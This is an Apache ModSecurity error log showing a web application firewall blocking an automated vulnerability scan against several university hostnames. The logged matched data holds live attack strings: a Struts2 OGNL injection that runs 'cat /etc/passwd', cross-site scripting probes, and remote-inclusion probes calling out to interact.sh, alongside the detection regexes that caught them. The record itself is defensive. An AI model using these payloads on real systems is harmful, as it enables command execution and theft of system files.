[Tue Aug 29 11:51:05.434742 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAl4sWsAAAAf"]
[Tue Aug 29 11:51:05.486914 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAfWOBUAAAAL"]
[Tue Aug 29 11:51:05.507162 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAfWOBYAAAAL"]
[Tue Aug 29 11:51:05.522081 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAknEL8AAAAB"]
[Tue Aug 29 11:51:05.604684 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAknEMIAAAAB"]
[Tue Aug 29 11:51:05.652145 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAfWOBoAAAAL"]
[Tue Aug 29 11:51:05.755191 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAlIBewAAAAn"]
[Tue Aug 29 11:51:05.762621 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAm5BuMAAAAA"]
[Tue Aug 29 11:51:05.778333 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAlIBe0AAAAn"]
[Tue Aug 29 11:51:05.903242 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAm5BukAAAAA"]
[Tue Aug 29 11:51:05.936513 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAlIBfQAAAAn"]
[Tue Aug 29 11:51:06.017215 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OsCo-f0AAAlIBfcAAAAn"]
[Tue Aug 29 11:51:06.258412 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAlIBgEAAAAn"]
[Tue Aug 29 11:51:06.267493 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAhoHO8AAAAl"]
[Tue Aug 29 11:51:06.272763 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAknEMgAAAAB"]
[Tue Aug 29 11:51:06.278958 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAlIBgIAAAAn"]
[Tue Aug 29 11:51:06.305499 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAlIBgMAAAAn"]
[Tue Aug 29 11:51:06.325203 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OsCo-f0AAAhoHPEAAAAl"]
[Tue Aug 29 11:51:06.339631 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OsCo-f0AAAfWOCMAAAAL"]
[Tue Aug 29 11:51:06.548061 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAl4sW4AAAAf"]
[Tue Aug 29 11:51:06.586647 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OsCo-f0AAAlIBgcAAAAn"]
[Tue Aug 29 11:51:06.627538 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OsCo-f0AAAm5BvEAAAAA"]
[Tue Aug 29 11:51:08.571488 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAmIbOkAAAAo"]
[Tue Aug 29 11:51:08.572062 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAknENAAAAAB"]
[Tue Aug 29 11:51:08.637227 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAm7m8gAAAAE"]
[Tue Aug 29 11:51:08.641553 2023] [:error] [pid 2501] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAnFrvsAAAAP"]
[Tue Aug 29 11:51:08.643377 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAnGkHQAAAAR"]
[Tue Aug 29 11:51:08.664250 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAm5BvsAAAAA"]
[Tue Aug 29 11:51:08.691785 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] 